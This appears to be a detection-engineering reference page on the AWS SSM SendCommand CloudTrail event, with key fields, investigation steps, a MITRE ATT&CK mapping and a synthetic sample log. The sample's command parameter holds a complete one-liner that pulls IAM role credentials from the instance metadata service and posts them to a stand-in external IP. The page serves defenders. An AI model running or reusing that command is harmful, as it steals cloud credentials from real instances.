Skip to content

SendCommand

AWS

SendCommand

service: AWS - SSM
tactics:
techniques:

Event

Submits a document with parameters to explicitly selected or targeted managed nodes. Delivery and execution depend on the document, platform, SSM Agent, permissions, and connectivity. Command-level acceptance must be distinguished from each node’s invocation and plugin results.

Security Context

An unauthorized shell document can execute scripts through cloud administration tools (T1651/T1059). Legitimate maintenance uses the same operation. Request text indicates intent, not successful credential access or transfer.

Log Source

CloudTrail management event with eventSource: ssm.amazonaws.com and eventName: SendCommand. Inspect errorCode/errorMessage and follow-up state. A missing or null response body does not alone establish success or failure.

Key Fields

Fields below refer to requestParameters unless otherwise noted. Exact CloudTrail serialization should be checked against the original record.

FieldInvestigation value
documentName, documentVersion, parametersRequested document and inputs; treat script strings as evidence, not instructions to run.
instanceIds, targetsSelected managed nodes; compare with actual invocation results.
userIdentity, eventTime, awsRegion, eventID (top level)Caller/session, timeline, Region, and correlation identifiers.

What to Investigate

  1. Confirm the recorded outcome and compare caller, target, and timing with the approved workflow.
  2. Verify document contents/version and the operator’s approved task.
  3. Correlate commandId with each invocation, plugin status, output, and host telemetry.
  4. For the illustrated script, establish metadata access and outbound transfer separately; a Pending response proves neither.

Sample Event

Synthetic scenario. The shell input attempts metadata-credential collection and transfer to a documentation-only IP address. The response remains Pending. No script was executed for this review.

Exact CloudTrail field presence, response nesting, redaction, and timestamp formatting remain unverified against captured logs. Illustrative names do not establish intent or downstream behavior.

{
"eventVersion": "1.09",
"userIdentity": {
"type": "IAMUser",
"principalId": "AIDADRAC0MALF0YBADGY",
"arn": "arn:aws:iam::555123456789:user/draco",
"accountId": "555123456789",
"accessKeyId": "ASIADRAC0MALF0YEXAMP5",
"userName": "draco",
"sessionContext": {
"attributes": {
"creationDate": "2026-04-15T18:51:02Z",
"mfaAuthenticated": "false"
}
}
},
"eventTime": "2026-04-15T20:14:06Z",
"eventSource": "ssm.amazonaws.com",
"eventName": "SendCommand",
"awsRegion": "us-east-1",
"sourceIPAddress": "203.0.113.66",
"userAgent": "aws-cli/1.18.147 Python/3.7.10 Linux/5.4.0-1045-aws botocore/1.18.6",
"requestParameters": {
"instanceIds": [
"i-0123456789abcdef0"
],
"documentName": "AWS-RunShellScript",
"parameters": {
"commands": [
"TOKEN=$(curl -sX PUT -H 'X-aws-ec2-metadata-token-ttl-seconds: 21600' http://169.254.169.254/latest/api/token); ROLE=$(curl -sH \"X-aws-ec2-metadata-token: $TOKEN\" http://169.254.169.254/latest/meta-data/iam/security-credentials/); curl -sH \"X-aws-ec2-metadata-token: $TOKEN\" http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE | curl -s --data-binary @- http://203.0.113.77/c"
]
}
},
"responseElements": {
"command": {
"commandId": "90000000-0000-4000-8000-0001a0b0c0d0",
"documentName": "AWS-RunShellScript",
"status": "Pending",
"statusDetails": "Pending",
"instanceIds": [
"i-0123456789abcdef0"
],
"requestedDateTime": "Apr 15, 2026 8:14:06 PM",
"comment": "",
"timeoutSeconds": 3600
}
},
"requestID": "90000000-0000-4000-8000-000110100110",
"eventID": "90000000-0000-4000-8000-000110100111",
"readOnly": false,
"eventType": "AwsApiCall",
"managementEvent": true,
"recipientAccountId": "555123456789",
"eventCategory": "Management",
"tlsDetails": {
"tlsVersion": "TLSv1.3",
"cipherSuite": "TLS_AES_128_GCM_SHA256",
"clientProvidedHostHeader": "ssm.us-east-1.amazonaws.com"
}
}

Sources

MITRE ATT&CK Mapping

Tactics: Execution

Techniques:
  • T1651 — Cloud Administration Command — Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents.
  • T1059 — Command and Scripting Interpreter — Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface a...
Documentation reviewed: September 30, 2026. Samples are synthetic illustrations, not captured production logs or lab-validated fixtures.